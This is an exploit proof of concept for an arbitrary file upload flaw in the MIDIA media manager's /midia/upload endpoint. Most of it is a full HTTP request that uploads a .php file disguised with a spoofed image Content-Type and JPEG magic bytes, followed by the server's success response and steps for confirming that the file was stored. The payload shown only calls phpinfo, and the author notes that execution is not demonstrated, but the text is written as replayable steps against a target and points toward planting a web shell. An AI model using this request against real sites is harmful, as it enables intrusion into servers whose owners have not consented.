# Exploit Title: MIDIA Unrestricted File Upload / Arbitrary File Upload
# Description: The MIDIA media-manager upload endpoint (/midia/upload) accepts a multipart file whose filename carries a .php extension and stores it under the chosen directory_name, echoing the unchanged filename back in the JSON response. The request below spoofs Content-Type: image/jpeg and prepends JPEG magic bytes (FF D8 FF E0) to the body, so any MIME/signature check passes while the extension itself is not validated. The request shown carries a session cookie and CSRF token, so the endpoint appears to require an authenticated session; whether the stored .php file is actually executed depends on how the web server serves the upload directory (not demonstrated here).
# Date: 2024-10-02
# Exploit Author: Khunerable
# Vendor Homepage: https://github.com/itskodinger/midia/tree/master
# Tested on: Windows 11,Windows NT 10.0
//////////////////////////////////////////////////////////////////////////////////////////
PoC:
To list the files in a directory (and confirm the directory name used below), request, for example:
example.com/midia/get/1?key=&directory_name=blog
//////////////////////////////////////////////////////////////////////////////////////////
Upload request (replace the cookies and X-Csrf-Token with values from your own session on the target; the boundary and Content-Length must match the body you actually send):
POST /midia/upload?directory_name=blog HTTP/2
Host: example.com
Cookie: XSRF-TOKEN=eyJpdiI6IkppemZjRTk2eGxTeENIeGdNMXBGcnc9PSIsInZhbHVlIjoiYjFuOVBqcDRBVFBIck5HUEdXTXJMZEFaRERwbElYdGdmMzR0WXpXY3dMQkg5QlVzMVNwMmsrTElzeWc1SWlhZm9WS1cwblQyYXZWMFZDYmVGMnlXZlk3bmtxZ2dnc04rVFpUTkt4ckVmTzBDazFlbnJpTXJ3WHkyUDJib1krTWwiLCJtYWMiOiIxNTM5ZDZmZjUyOGZjZmVmZjZkZDM5YWNjZDUxMGU4YWJmMDYxNWI2ZTJjNGFlZDM0ZmVhODEzNmI2YjRiMGVlIiwidGFnIjoiIn0%3D; expires=Wed, 11-Dec-2024 10:04:04 GMT; Max-Age=6048000; path=/; example_session=eyJpdiI6Im55citKcFA2MVcyNjQvbWRkdEJXelE9PSIsInZhbHVlIjoicmdZdXpsSVk5N29vVTFvYVVUYVZqUjREZzRNbVNjRWxlQndlMFpOb2RGUEdGanhPaW9CUlFSenpjVVg3UHNhSmNZY1Y4c0dVWi9aWnZkQWFvK3lhOGN4eUR0Vjh0ZjVEU0pWS0dxRkQ2TEhPNStqRFBTZXNPRmRWR2xGc3hVaUEiLCJtYWMiOiJkNGM4ODNhNmQxODU3NDE2ZDlkODEzZWQwN2FhZmEyNjY5MDIyMjBkZGUyNGFlYzllNmFlZWQ3N2RlZTA2MzJlIiwidGFnIjoiIn0%3D; expires=Wed, 11-Dec-2024 10:04:04 GMT; Max-Age=6048000; path=/; httponly
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------2046057511352620401550882142
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
X-Csrf-Token: TOKEN FROM YOUR TARGET
Content-Length: 25970
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers
-----------------------------2046057511352620401550882142
Content-Disposition: form-data; name="file"; filename="dummy.php"
Content-Type: image/jpeg
ÿØÿà<?php phpinfo(); ?>
-----------------------------2046057511352620401550882142--
//////////////////////////////////////////////////////////////////////////////////////////
Server response (HTTP 200; the JSON echoes the .php filename unchanged, showing the extension was not rejected or renamed):
HTTP/2 200 OK
Date: Wed, 02 Oct 2024 10:05:20 GMT
Content-Type: application/json
Set-Cookie: PHPSESSID=jhkv7osdakd7env44ttb1tn2hg; path=/
Set-Cookie: XSRF-TOKEN=eyJpdiI6IlM3WHloNW1mN0xHNlp3ekZmOVhGN1E9PSIsInZhbHVlIjoia1JEdGE5WWh1NWVmMlZqZWpyakVmZFIvVnFDODlGNmZJN2g1OFNkQnhxZ0c0ZWRUMHBieHBKd3FyS0NrVFhBSzV3anBJakZiS3RmZHBZanJBRW0ydTMzT1daeVYwM2VBN3FBUW9YRHZudE1kQitDNUlVWnpqbkV0NWQrTENlMUYiLCJtYWMiOiJlMWVhNmE2YTFiMmU4OGFlOTI0ODJkNWM2NDA1YTdhMmU5M2UzZjAyN2U3YjkxYmRhZmJkM2UwNTFlYzEwMTY2IiwidGFnIjoiIn0%3D; expires=Wed, 11-Dec-2024 10:05:20 GMT; Max-Age=6048000; path=/
Set-Cookie: example_session=eyJpdiI6InBjRGRNODRxb2xVbVJtY1FSVHJwakE9PSIsInZhbHVlIjoiTkZmYTFRU0d2bEc0TGRNUDBHRFdnZkpONHdvZEtGYWcyd29nZTRmM0psb29Ka0xnV1QyVFk2eXppZ0dFTUd4UTVqdGVLMTFMWEhxU2Vqa2cvTVRnVHJjVGdLRk9pT05EQ0poNzZFNE1kQWJEZ3RoT1U0a0huRW54aWliNmVLVmIiLCJtYWMiOiI5YTQwYjVjZGRkM2QyN2QzNjEyNDZiMjEyNzM1YmE5NzEwYWQ5ODg3NWZmMzkxOTc3ODhhZDM2Y2FhNTA4OGU2IiwidGFnIjoiIn0%3D; expires=Wed, 11-Dec-2024 10:05:20 GMT; Max-Age=6048000; path=/; httponly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: no-cache, private
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Cf-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ESYQOsUB3yx%2Bqe61NJ9P8kB9lCtae9k0g4ItrJcmU2PaXgZJpUHXbgevDkOOHZ6QdCq%2BKCir4QOuTBkX25XhWTvr7SKLWJ93Rl9C9H0Qop9zwh%2BilB2W2evHRu0HSptz7OQ%3D"}],"group":"cf-nel","max_age":604800}
Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
Cf-Ray: 8cc3df974e5904b9-HKG
{"success":"dummy.php"}
//////////////////////////////////////////////////////////////////////////////////////////
The uploaded file then appears in the directory listing at example.com/midia/get/1?key=&directory_name=blog, confirming it was stored with the .php extension. Note that this listing only proves storage, not execution: the file is exploitable as a web shell only if the upload directory is served with the PHP handler enabled, which must be verified separately.